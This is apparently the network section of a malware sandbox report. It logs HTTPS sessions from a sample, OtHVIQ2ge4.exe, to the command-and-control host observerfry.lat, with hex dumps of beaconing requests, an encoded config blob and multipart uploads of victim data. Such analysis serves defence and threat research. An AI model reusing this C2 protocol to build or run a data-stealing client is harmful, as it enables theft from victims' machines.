0	192.168.2.9	49717	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:20:56 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: observerfry.lat
2024-12-23 16:20:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-23 16:20:56 UTC	1119	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:20:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qmi9ctlnnv5nmrs2vc3v7l44lu; expires=Fri, 18 Apr 2025 10:07:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mXTWTBRXnuXAKo1p9IMnenqCPUtoSb47iOZVXyOg0HieLijjltVz47aNZStKtnstaBKFUFeArYOSgj6dHmOt6qDx%2FF37z8ZehQ8AchGiGTNi9fM5KLdyNLHMXT86VD6SQ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69ae8d5b72438c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1609&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1613259&cwnd=245&unsent_bytes=0&cid=0c45ab6d08ea339b&ts=742&x=0"
2024-12-23 16:20:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-23 16:20:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49723	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:20:58 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: observerfry.lat
2024-12-23 16:20:58 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 16:20:59 UTC	1122	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:20:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8hhp30rkncg6op416rqjvs5ut1; expires=Fri, 18 Apr 2025 10:07:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CXFIljIsKTHfTcfOsSPxgoiWBd2ClK131YgwaqfsaP8bwDyYjXPP67VchVdykXr60FlxKZpBDRHPYdfphJRwsGlLW9uItax2Z%2FaLjSVrWZgR5OxveComd%2FQxrinyAoLD4pY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69ae9bf91ef5f7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1601&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1769696&cwnd=237&unsent_bytes=0&cid=c0cc70586de55251&ts=1428&x=0"
2024-12-23 16:20:59 UTC	247	IN	Data Raw: 34 39 31 63 0d 0a 39 69 35 61 78 35 78 68 68 73 65 4a 49 54 36 38 4a 75 62 63 4b 73 74 69 69 77 43 38 6f 34 76 38 75 47 73 5a 51 2b 35 6f 6d 36 4b 4e 44 43 7a 6c 70 6c 57 71 35 66 70 45 48 49 5a 53 6c 4b 6c 50 35 30 44 71 5a 4a 36 5a 37 5a 33 55 47 48 78 76 7a 42 37 32 67 4d 78 49 4f 36 76 76 42 4b 72 6c 37 46 6b 63 68 6e 32 64 2f 6b 2b 6c 51 4c 45 69 32 63 6e 70 6e 64 51 4a 65 43 69 42 47 50 66 42 6e 6b 49 39 72 2f 6b 43 34 71 62 6c 54 46 76 5a 51 34 65 32 52 4b 49 50 34 32 32 65 6a 36 6d 5a 77 6b 6b 6a 59 61 4d 4e 37 38 4f 37 54 79 6d 73 76 68 79 71 76 4b 74 45 55 4a 34 63 78 4c 31 50 71 51 37 74 5a 4e 66 4c 34 35 54 63 43 48 30 70 6e 67 48 39 79 70 35 4d 50 71 37 7a 43 2f 61 72 37 30 74 51 33 30 6d 48 2f 67 62 70 42 2f 45 69 68 Data Ascii: 491c9i5ax5xhhseJIT68JubcKstiiwC8o4v8uGsZQ+5om6KNDCzlplWq5fpEHIZSlKlP50DqZJ6Z7Z3UGHxvzB72gMxIO6vvBKrl7Fkchn2d/k+lQLEi2cnpndQJeCiBGPfBnkI9r/kC4qblTFvZQ4e2RKIP422ej6mZwkkjYaMN78O7TymsvhyqvKtEUJ4cxL1PqQ7tZNfL45TcCH0pngH9yp5MPq7zC/ar70tQ30mH/gbpB/Eih
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 6f 47 36 72 4e 6b 59 61 6a 53 42 47 76 2b 41 69 77 49 68 35 66 6b 50 70 50 32 72 53 31 44 51 51 59 65 78 54 36 67 41 2b 32 33 65 77 75 47 57 33 67 4e 30 4c 6f 4d 45 38 38 65 63 52 54 2b 71 2b 51 76 69 71 75 67 44 45 70 35 44 6e 50 34 51 36 53 44 35 59 64 33 56 35 49 2b 61 46 6a 55 34 7a 41 33 31 67 4d 77 4d 50 71 76 2f 44 75 53 33 34 30 68 58 32 31 61 50 74 30 57 6b 41 4f 52 6f 30 63 4c 70 6d 64 41 44 64 43 75 49 42 2f 54 47 6c 45 78 34 36 37 34 45 2f 4f 57 7a 41 33 2f 62 56 49 4f 79 58 75 73 36 71 58 32 51 32 4b 6d 5a 31 6b 6b 6a 59 59 51 50 2b 73 4f 66 51 7a 75 74 39 52 48 6b 74 2b 31 4f 57 63 78 43 67 62 42 43 71 68 4c 6a 62 4e 6a 43 34 4a 58 54 44 48 77 6c 7a 45 53 35 78 34 77 4d 59 4f 58 66 44 75 2b 70 34 56 52 63 6e 6c 76 4b 70 77 69 75 44 4b 6b 36 Data Ascii: oG6rNkYajSBGv+AiwIh5fkPpP2rS1DQQYexT6gA+23ewuGW3gN0LoME88ecRT+q+QviqugDEp5DnP4Q6SD5Yd3V5I+aFjU4zA31gMwMPqv/DuS340hX21aPt0WkAORo0cLpmdADdCuIB/TGlEx4674E/OWzA3/bVIOyXus6qX2Q2KmZ1kkjYYQP+sOfQzut9RHkt+1OWcxCgbBCqhLjbNjC4JXTDHwlzES5x4wMYOXfDu+p4VRcnlvKpwiuDKk6
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 4b 61 52 7a 73 6d 6c 45 71 68 67 4c 35 50 4c 4b 62 30 51 64 47 6d 35 55 31 62 79 41 53 62 38 46 48 70 42 2b 55 69 68 6f 48 6b 6e 39 49 50 61 53 36 42 43 66 66 4f 6d 30 6b 33 72 66 34 44 36 61 44 76 53 46 66 64 53 59 43 73 51 71 6b 49 37 47 50 55 79 36 6e 51 6d 67 35 6a 59 64 52 4b 79 4e 65 66 44 67 32 6d 38 41 33 6a 73 36 74 63 45 73 63 45 67 37 49 49 38 55 44 6b 61 74 76 45 35 70 2f 51 42 33 34 72 67 41 4c 33 77 34 5a 44 50 4b 58 79 43 2b 36 6f 35 55 64 55 31 30 2b 50 75 45 69 6f 43 71 6b 73 6e 73 62 78 33 6f 4a 4a 54 79 61 41 42 2f 61 43 6f 55 38 32 71 2f 6b 56 70 4c 71 6c 57 68 7a 5a 53 4d 54 6d 43 4b 55 4a 36 57 6e 55 78 65 6d 5a 31 77 78 34 4a 6f 38 48 2f 73 71 61 53 7a 79 70 39 77 37 69 70 65 78 48 57 63 78 42 6a 62 4a 45 36 55 36 70 5a 63 61 42 73 Data Ascii: KaRzsmlEqhgL5PLKb0QdGm5U1byASb8FHpB+UihoHkn9IPaS6BCffOm0k3rf4D6aDvSFfdSYCsQqkI7GPUy6nQmg5jYdRKyNefDg2m8A3js6tcEscEg7II8UDkatvE5p/QB34rgAL3w4ZDPKXyC+6o5UdU10+PuEioCqksnsbx3oJJTyaAB/aCoU82q/kVpLqlWhzZSMTmCKUJ6WnUxemZ1wx4Jo8H/sqaSzyp9w7ipexHWcxBjbJE6U6pZcaBs
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 33 59 64 52 4b 38 4d 6d 47 51 6a 61 73 38 77 58 73 6f 75 56 4f 56 39 68 50 67 37 6c 4f 70 41 6a 6b 5a 39 33 41 37 5a 54 49 43 6e 41 72 67 51 43 35 6a 74 52 4c 49 4f 57 6d 51 38 4f 70 77 6c 4e 48 7a 46 4c 45 6f 51 61 77 51 4f 35 75 6e 70 6d 70 6e 64 55 41 64 43 6d 45 42 66 62 45 6d 6b 6f 2b 71 50 73 4d 37 72 66 6a 54 56 48 56 53 34 2b 73 53 4b 51 45 35 57 62 57 79 75 50 65 6c 45 6c 38 4f 63 78 53 75 66 57 5a 51 7a 69 6d 36 45 50 37 36 2f 49 44 57 39 49 45 33 50 35 45 70 77 44 6d 62 74 4c 4b 34 5a 2f 57 42 33 77 6b 68 51 4c 78 30 70 56 49 4d 4b 54 77 44 4f 57 68 37 6b 5a 59 32 55 43 43 73 51 6a 6e 51 4f 35 36 6e 70 6d 70 73 66 30 38 4f 51 43 32 53 75 61 4f 6a 51 77 2f 71 62 35 62 70 4b 6e 6f 54 31 54 52 51 6f 32 79 51 71 41 4c 35 57 6e 61 7a 65 43 62 33 41 Data Ascii: 3YdRK8MmGQjas8wXsouVOV9hPg7lOpAjkZ93A7ZTICnArgQC5jtRLIOWmQ8OpwlNHzFLEoQawQO5unpmpndUAdCmEBfbEmko+qPsM7rfjTVHVS4+sSKQE5WbWyuPelEl8OcxSufWZQzim6EP76/IDW9IE3P5EpwDmbtLK4Z/WB3wkhQLx0pVIMKTwDOWh7kZY2UCCsQjnQO56npmpsf08OQC2SuaOjQw/qb5bpKnoT1TRQo2yQqAL5WnazeCb3A
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 47 50 37 4a 68 6b 49 31 71 76 59 4c 37 61 54 76 52 6c 48 59 53 49 36 2f 54 36 63 4f 34 53 4b 51 67 65 36 47 6d 6c 45 37 41 4a 77 52 36 39 61 5a 62 54 57 71 76 68 79 71 76 4b 74 45 55 4a 34 63 78 4c 64 61 72 51 33 37 61 39 6e 50 35 70 33 49 43 48 59 71 6e 67 33 32 78 4a 4e 41 50 71 72 34 41 75 47 76 35 30 52 5a 31 55 75 49 2f 67 62 70 42 2f 45 69 68 6f 48 48 6c 63 6b 65 65 43 2b 48 48 4f 4b 41 69 77 49 68 35 66 6b 50 70 50 32 72 51 46 66 56 51 49 53 79 53 4b 30 4e 36 58 44 52 78 75 36 58 30 52 74 78 4a 6f 73 42 38 63 75 62 53 69 71 70 38 42 48 68 74 2f 6b 44 45 70 35 44 6e 50 34 51 36 54 62 75 63 73 37 43 71 36 2f 4d 43 6d 30 71 67 51 61 35 33 39 70 56 65 4b 4c 79 51 37 7a 6c 37 55 78 56 33 55 75 46 74 30 53 6b 42 65 42 6e 33 38 66 74 6c 4e 41 4a 66 53 65 Data Ascii: GP7JhkI1qvYL7aTvRlHYSI6/T6cO4SKQge6GmlE7AJwR69aZbTWqvhyqvKtEUJ4cxLdarQ37a9nP5p3ICHYqng32xJNAPqr4AuGv50RZ1UuI/gbpB/EihoHHlckeeC+HHOKAiwIh5fkPpP2rQFfVQISySK0N6XDRxu6X0RtxJosB8cubSiqp8BHht/kDEp5DnP4Q6Tbucs7Cq6/MCm0qgQa539pVeKLyQ7zl7UxV3UuFt0SkBeBn38ftlNAJfSe
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 64 52 4c 4e 4f 57 6d 51 2b 65 69 36 45 4a 57 31 30 69 4c 75 55 79 37 43 75 35 77 33 38 44 69 6b 39 59 4a 64 69 79 47 43 2f 44 4e 6d 45 45 2f 6f 76 45 47 70 4f 75 72 52 45 53 65 48 4d 53 66 52 61 49 4d 73 6a 69 65 33 71 65 48 6d 67 35 33 59 64 52 4b 2b 63 71 52 52 6a 57 6d 38 51 44 32 70 4f 31 52 58 4e 4e 4f 6c 72 52 44 72 41 33 6b 62 39 33 48 37 35 58 57 47 33 49 68 6a 77 47 35 6a 74 52 4c 49 4f 57 6d 51 38 65 79 2f 55 6c 62 30 6c 4b 50 76 30 75 2f 44 66 6b 69 6b 49 48 34 6d 63 74 4a 49 7a 65 63 48 66 37 66 32 6c 56 34 6f 76 4a 44 76 4f 58 74 53 6c 72 5a 51 6f 71 73 54 61 38 50 35 6d 76 58 78 65 47 64 32 67 31 2f 4a 6f 6b 4a 39 63 75 54 54 7a 65 68 39 77 33 74 71 71 73 4e 48 4e 6c 63 78 4f 59 49 69 42 76 71 62 74 4f 42 39 74 44 44 53 58 77 74 7a 46 4b 35 Data Ascii: dRLNOWmQ+ei6EJW10iLuUy7Cu5w38Dik9YJdiyGC/DNmEE/ovEGpOurRESeHMSfRaIMsjie3qeHmg53YdRK+cqRRjWm8QD2pO1RXNNOlrRDrA3kb93H75XWG3IhjwG5jtRLIOWmQ8ey/Ulb0lKPv0u/DfkikIH4mctJIzecHf7f2lV4ovJDvOXtSlrZQoqsTa8P5mvXxeGd2g1/JokJ9cuTTzeh9w3tqqsNHNlcxOYIiBvqbtOB9tDDSXwtzFK5
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 69 75 36 41 62 6a 73 36 6c 32 58 39 42 4b 67 36 67 49 74 6a 2b 6e 49 74 48 62 71 63 62 6a 45 44 73 6d 67 45 71 68 67 49 46 4c 4f 4b 4c 6b 46 65 4f 70 2b 6b 68 52 30 6d 61 4c 75 56 36 71 44 2b 70 7a 31 34 33 69 6b 35 70 48 4f 79 61 55 53 71 47 41 75 30 73 75 70 74 45 41 39 61 79 72 44 52 7a 5a 55 73 54 6d 43 4a 64 41 2b 32 48 4f 77 75 61 50 35 45 6b 6a 4f 4c 4a 4b 38 74 61 54 58 44 75 7a 39 51 37 6f 74 4e 55 44 42 49 6f 57 31 75 77 61 2b 78 2b 70 66 65 47 50 71 5a 2b 61 55 55 49 34 7a 42 79 35 6d 4d 59 43 65 4c 65 2b 57 36 54 69 36 46 46 4f 32 45 65 53 76 51 2b 58 50 73 35 30 31 4d 62 35 6d 63 30 47 4f 32 2f 4d 42 62 6d 59 72 51 77 78 6f 75 55 53 38 71 6a 37 52 42 7a 68 43 73 53 6d 43 50 46 41 33 47 48 51 7a 2b 36 49 79 30 52 63 4e 34 59 4e 36 63 65 44 51 Data Ascii: iu6Abjs6l2X9BKg6gItj+nItHbqcbjEDsmgEqhgIFLOKLkFeOp+khR0maLuV6qD+pz143ik5pHOyaUSqGAu0suptEA9ayrDRzZUsTmCJdA+2HOwuaP5EkjOLJK8taTXDuz9Q7otNUDBIoW1uwa+x+pfeGPqZ+aUUI4zBy5mMYCeLe+W6Ti6FFO2EeSvQ+XPs501Mb5mc0GO2/MBbmYrQwxouUS8qj7RBzhCsSmCPFA3GHQz+6Iy0RcN4YN6ceDQ
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 4e 37 36 58 73 55 30 72 46 43 49 79 39 55 72 4d 2b 31 30 6e 53 78 2b 36 45 33 51 39 64 41 63 78 45 75 63 2f 55 46 41 48 6c 74 6b 50 62 36 36 74 62 48 49 59 45 73 62 31 47 70 77 66 2f 63 35 50 70 79 71 54 67 53 31 63 6d 6d 55 6a 4e 78 34 52 64 4d 36 6a 79 51 36 72 6c 37 51 4d 45 6a 67 72 45 75 6c 6e 70 57 4c 6b 77 68 5a 53 36 79 59 70 62 5a 47 2b 56 53 75 2b 41 7a 42 35 32 35 65 78 44 76 4f 57 73 51 45 37 4d 51 6f 65 6f 53 2b 34 2b 31 30 58 51 78 75 69 49 79 68 35 30 48 37 49 66 2b 73 36 61 53 79 36 30 76 6b 32 6b 71 71 73 62 5a 5a 34 4d 78 49 45 47 36 52 69 70 4f 70 37 30 36 70 44 55 44 6d 30 77 77 53 33 33 78 35 56 61 4b 4c 4c 78 51 36 72 6c 37 51 4d 45 6a 41 72 45 75 6c 6e 70 57 4c 6b 77 68 5a 53 36 79 59 70 62 5a 47 2b 56 53 75 2b 41 7a 42 35 32 35 65 Data Ascii: N76XsU0rFCIy9UrM+10nSx+6E3Q9dAcxEuc/UFAHltkPb66tbHIYEsb1Gpwf/c5PpyqTgS1cmmUjNx4RdM6jyQ6rl7QMEjgrEulnpWLkwhZS6yYpbZG+VSu+AzB525exDvOWsQE7MQoeoS+4+10XQxuiIyh50H7If+s6aSy60vk2kqqsbZZ4MxIEG6RipOp706pDUDm0wwS33x5VaKLLxQ6rl7QMEjArEulnpWLkwhZS6yYpbZG+VSu+AzB525e
2024-12-23 16:20:59 UTC	1369	IN	Data Raw: 37 46 56 66 6e 67 72 45 73 67 6a 78 51 4f 68 6f 7a 73 7a 6d 6d 5a 59 4f 59 53 62 4d 52 4c 6e 4f 31 42 52 34 70 50 51 54 36 61 72 73 44 31 72 51 53 73 53 68 42 72 42 41 2f 79 4b 47 6b 71 66 65 79 45 6b 6a 59 63 73 4a 36 39 4b 53 54 79 36 6d 75 54 33 61 69 50 6c 45 54 4e 30 47 74 62 4e 4d 76 78 58 71 63 74 6e 2f 31 37 50 49 44 6d 73 69 7a 6a 76 76 77 35 52 43 50 2b 57 77 51 2f 7a 6c 73 77 4e 78 7a 45 4f 55 76 51 6a 6e 51 4f 55 69 68 6f 48 6b 6a 4e 30 5a 65 47 32 4c 45 50 36 41 69 77 49 68 35 65 68 44 76 50 61 6c 41 30 36 65 48 4d 54 35 52 71 51 42 36 6d 7a 64 30 2f 75 59 32 52 39 34 5a 72 49 30 31 4e 4b 54 58 44 76 6e 7a 77 37 67 73 2f 35 41 54 4e 6c 36 75 70 4e 61 72 68 44 71 49 50 4c 47 35 4a 4c 6b 4e 30 77 77 69 78 71 37 35 70 64 61 4f 2b 57 77 51 2f 7a Data Ascii: 7FVfngrEsgjxQOhozszmmZYOYSbMRLnO1BR4pPQT6arsD1rQSsShBrBA/yKGkqfeyEkjYcsJ69KSTy6muT3aiPlETN0GtbNMvxXqctn/17PIDmsizjvvw5RCP+WwQ/zlswNxzEOUvQjnQOUihoHkjN0ZeG2LEP6AiwIh5ehDvPalA06eHMT5RqQB6mzd0/uY2R94ZrI01NKTXDvnzw7gs/5ATNl6upNarhDqIPLG5JLkN0wwixq75pdaO+WwQ/z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49729	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:01 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E2DQ77VNG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12797 Host: observerfry.lat
2024-12-23 16:21:01 UTC	12797	OUT	Data Raw: 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 32 44 51 37 37 56 4e 47 0d 0a 43 6f 6e 74 65 6e Data Ascii: --E2DQ77VNGContent-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--E2DQ77VNGContent-Disposition: form-data; name="pid"2--E2DQ77VNGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--E2DQ77VNGConten
2024-12-23 16:21:02 UTC	1122	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:21:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jfjo2t70odt83aiv5nq8euk5lq; expires=Fri, 18 Apr 2025 10:07:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSxPZCqF0UX7ZIWCfcoSUfwjjetmHMqAZDuXkdwJvNWBzCMhjkYOBbdo6g9CQClGJ3ueENnBzqWbx1bW1YaVyy3A6sHgoTYFbzlTJ9FaflFQarb8d1qBEsmzvao6ds4g1FM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69aeac6ed67295-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2163&min_rtt=2140&rtt_var=819&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13727&delivery_rate=1364485&cwnd=206&unsent_bytes=0&cid=041b9215ca65f227&ts=1007&x=0"
2024-12-23 16:21:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:21:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49735	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:03 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IM0Z09FOG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15015 Host: observerfry.lat
2024-12-23 16:21:03 UTC	15015	OUT	Data Raw: 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 49 4d 30 5a 30 39 46 4f 47 0d 0a 43 6f 6e 74 65 6e Data Ascii: --IM0Z09FOGContent-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--IM0Z09FOGContent-Disposition: form-data; name="pid"2--IM0Z09FOGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--IM0Z09FOGConten
2024-12-23 16:21:04 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:21:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l1dgcne2ghd4pekamvhs9b0gsb; expires=Fri, 18 Apr 2025 10:07:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSdHLYAG%2FP%2BBp7aqu5SAHcMSz7LYp0aj2w%2BRKrylvhDi9b6NOqb0yOG66UBsvsHpUZzK18kQ0cx9fJsoYF1yamdiepZS3fI6Ydlvz6eB1qGHYpDwPonLCPN93dnakB%2B%2Ffwk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69aebb2b6c0fa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1668&rtt_var=851&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15945&delivery_rate=1135303&cwnd=252&unsent_bytes=0&cid=be67c246110055bb&ts=983&x=0"
2024-12-23 16:21:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:21:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49741	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:06 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ICQWIJFXDT77D23LZB4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20591 Host: observerfry.lat
2024-12-23 16:21:06 UTC	15331	OUT	Data Raw: 2d 2d 49 43 51 57 49 4a 46 58 44 54 37 37 44 32 33 4c 5a 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 43 51 57 49 4a 46 58 44 54 37 37 44 32 33 4c 5a 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 43 51 57 49 4a 46 58 44 54 37 37 44 32 33 4c 5a 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --ICQWIJFXDT77D23LZB4Content-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--ICQWIJFXDT77D23LZB4Content-Disposition: form-data; name="pid"3--ICQWIJFXDT77D23LZB4Content-Disposition: form-data; name="lid"LOGS11--Li
